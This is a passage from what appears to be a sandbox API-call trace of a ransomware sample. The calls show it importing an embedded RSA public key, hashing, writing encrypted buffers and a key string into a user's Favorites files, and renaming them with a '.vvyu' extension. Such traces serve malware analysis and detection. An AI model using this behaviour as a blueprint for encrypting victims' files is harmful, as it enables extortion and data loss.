KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.210] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0197.212] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0197.212] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.212] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0197.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0197.212] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0197.212] GetLastError () returned 0x0 [0197.212] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0197.212] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0197.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.212] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0197.212] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0197.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.212] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0197.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0197.213] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e950b0 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0197.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95068 [0197.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0197.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0197.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0197.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0197.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0197.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0197.214] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0197.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0197.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0197.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0197.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f90 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2f78 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0197.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0197.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0197.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0197.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0197.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0197.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0197.217] GetCurrentThreadId () returned 0x66c [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5920 [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0197.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.218] GetCurrentThreadId () returned 0x66c [0197.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0197.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0197.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0197.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0197.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0197.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0197.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0197.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0197.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0197.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0197.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f90 [0197.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ff0 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3008 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fa8 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0197.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0197.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0197.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f78 [0197.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0197.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0197.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0197.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0197.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0197.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0197.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0197.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0197.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0197.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0197.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0197.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0197.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0197.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0197.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0197.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0197.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95068 | out: hHeap=0x620000) returned 1 [0197.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0197.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0197.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0197.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0197.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0197.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0197.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0197.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0197.231] WriteFile (in: hFile=0x568, lpBuffer=0x2e915e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e915e0*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0197.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0197.232] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.232] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0197.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0197.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0197.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0197.233] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0197.234] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.234] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.234] CloseHandle (hObject=0x568) returned 1 [0197.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0197.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0197.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0197.236] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url.vvyu")) returned 1 [0197.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.237] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0197.241] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0197.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0197.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.241] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0197.241] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0197.242] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0197.242] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0197.245] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.245] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.247] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.247] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0197.247] lstrlenA (lpString="-----BEGIN PUBLIC 